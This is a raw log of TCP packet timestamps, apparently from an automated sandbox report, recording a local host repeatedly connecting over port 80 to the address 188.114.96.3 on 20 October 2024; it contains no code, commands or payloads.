                                                          Oct 20, 2024 18:18:21.870338917 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.870383978 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.874844074 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:22.230448008 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:22.235446930 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:22.235460997 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:22.235470057 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:22.689568043 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:22.776103020 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.059432983 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.166739941 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.180648088 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.181411982 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.186126947 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.186197042 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.186611891 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.186667919 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.186777115 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.191677094 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.541804075 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:23.546818972 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.546936035 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:23.546966076 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.449059963 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:24.453954935 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.454056025 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:24.454138041 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:24.458997965 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.479649067 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.651087046 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:24.807457924 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:24.812527895 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.812566996 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.843765974 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:24.963635921 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.270581007 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.346787930 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.351808071 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.351878881 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.351983070 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.356878042 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.436567068 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.630959988 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.698152065 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:25.703167915 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.703201056 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.703227997 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:25.776071072 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.162507057 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.355354071 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.544259071 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.544451952 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.544507027 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.730803967 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.730887890 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.730916977 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.731584072 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.737895966 CEST8049897188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.737982988 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.738043070 CEST4989780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.738070011 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.738178968 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.739694118 CEST8049904188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.739815950 CEST8049903188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.739865065 CEST4990480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.739883900 CEST4990380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.743088007 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.939599037 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.945040941 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:26.945132971 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.945271015 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:26.950146914 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.088637114 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.093684912 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.093718052 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.093744993 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.291822910 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.296804905 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.789022923 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.795231104 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.795278072 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.795356035 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.965095997 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.965195894 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.976411104 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:27.976486921 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.980592966 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:27.985498905 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.304075956 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.304095984 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.304125071 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.304153919 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.304186106 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.304186106 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.304368019 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.309261084 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.309273958 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.309413910 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.484462023 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.489593983 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.489666939 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.489783049 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.494982958 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.696439028 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.776031017 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.838606119 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:28.843529940 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.843581915 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:28.843610048 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.308402061 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.463529110 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.636044025 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.640995979 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.810120106 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.810348034 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.815341949 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.815356016 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.830126047 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.947443008 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.948012114 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.953214884 CEST8049920188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.953248978 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:30.953309059 CEST4992080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.953331947 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.953440905 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:30.958725929 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:31.204823017 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:31.275988102 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:31.307362080 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:31.312470913 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:31.312486887 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:31.312499046 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.026254892 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.027343988 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.027398109 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.109965086 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.110017061 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.374072075 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.374131918 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.374171972 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.374810934 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.379626989 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.380203009 CEST8049913188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.380281925 CEST8049914188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.380290031 CEST4991380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.380295992 CEST8049928188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.380315065 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.380330086 CEST4991480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.380352020 CEST4992880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.380475998 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.385483027 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.729177952 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:32.734252930 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.734287024 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:32.734314919 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:33.171194077 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:33.276324987 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.554187059 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:33.680862904 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.682387114 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.688020945 CEST8049933188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:33.688076019 CEST4993380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.689227104 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:33.689281940 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.689393044 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:33.694197893 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:34.041695118 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:34.046783924 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:34.046818018 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:34.046849966 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:34.474528074 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:34.666564941 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:35.146827936 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:35.147418976 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:35.147473097 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:35.991657972 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:35.997579098 CEST8049940188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:35.997654915 CEST4994080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.029051065 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.036166906 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.036323071 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.039418936 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.044996023 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.214797020 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.219641924 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.219724894 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.219856977 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.225090027 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.314486980 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.320142031 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.320207119 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.320341110 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.325505018 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.385966063 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.391329050 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.391402960 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.391432047 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.573015928 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.578154087 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.578532934 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.666632891 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:36.671782970 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.837785959 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:36.963435888 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:37.115701914 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.166651011 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:37.200413942 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.260299921 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:37.344726086 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.345263958 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:37.350136042 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.481452942 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.509793997 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.510169029 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:37.515661955 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.515768051 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.515782118 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:37.572796106 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:38.702492952 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.702883959 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.705341101 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:38.712833881 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.775885105 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:38.878670931 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.878834009 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:38.883780956 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.883810043 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:38.883836985 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.293513060 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.439177990 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.439264059 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.439265013 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.439923048 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.444493055 CEST8049945188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.444550037 CEST4994580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.444777012 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.444909096 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.444996119 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.445076942 CEST8049946188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.445128918 CEST4994680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.445142984 CEST8049949188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.445188999 CEST4994980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.449809074 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.792088032 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:39.797000885 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.797054052 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:39.797081947 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.219455004 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.354021072 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.453820944 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.575325012 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.575952053 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.580533981 CEST8049960188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.580687046 CEST4996080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.580784082 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.580857038 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.580960989 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.585722923 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.933163881 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:40.938313961 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.938369989 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:40.938419104 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:42.321527004 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:42.369609118 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.557351112 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:42.603960037 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.798871040 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.799472094 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.804372072 CEST8049966188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:42.804425955 CEST4996680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.804514885 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:42.804569006 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.804683924 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:42.809528112 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.150917053 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.155960083 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.155994892 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.156024933 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.588270903 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.635193110 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.714664936 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.719743967 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.719852924 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.719976902 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.724834919 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.816168070 CEST8049975188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.869570971 CEST4997580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.991564035 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.997066975 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:43.997162104 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:43.998157978 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.003057957 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.073936939 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.078841925 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.079710960 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.354509115 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.359620094 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.359654903 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.359688044 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.522319078 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.572690964 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.777638912 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.822705984 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.896449089 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:44.905917883 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:44.912753105 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.076777935 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.076968908 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.084175110 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.154947042 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.282160997 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.282861948 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.287822008 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.287908077 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.287992001 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.292929888 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.295171976 CEST8049980188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.295232058 CEST4998080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.460500956 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.461051941 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.465944052 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.626738071 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.626910925 CEST4997980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.631948948 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.631979942 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.632013083 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.635282040 CEST4998680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:45.640219927 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.640311003 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:45.640341043 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.030092955 CEST8049979188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.116389036 CEST8049986188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:46.135176897 CEST4997980192.168.2.5188.114.96.3
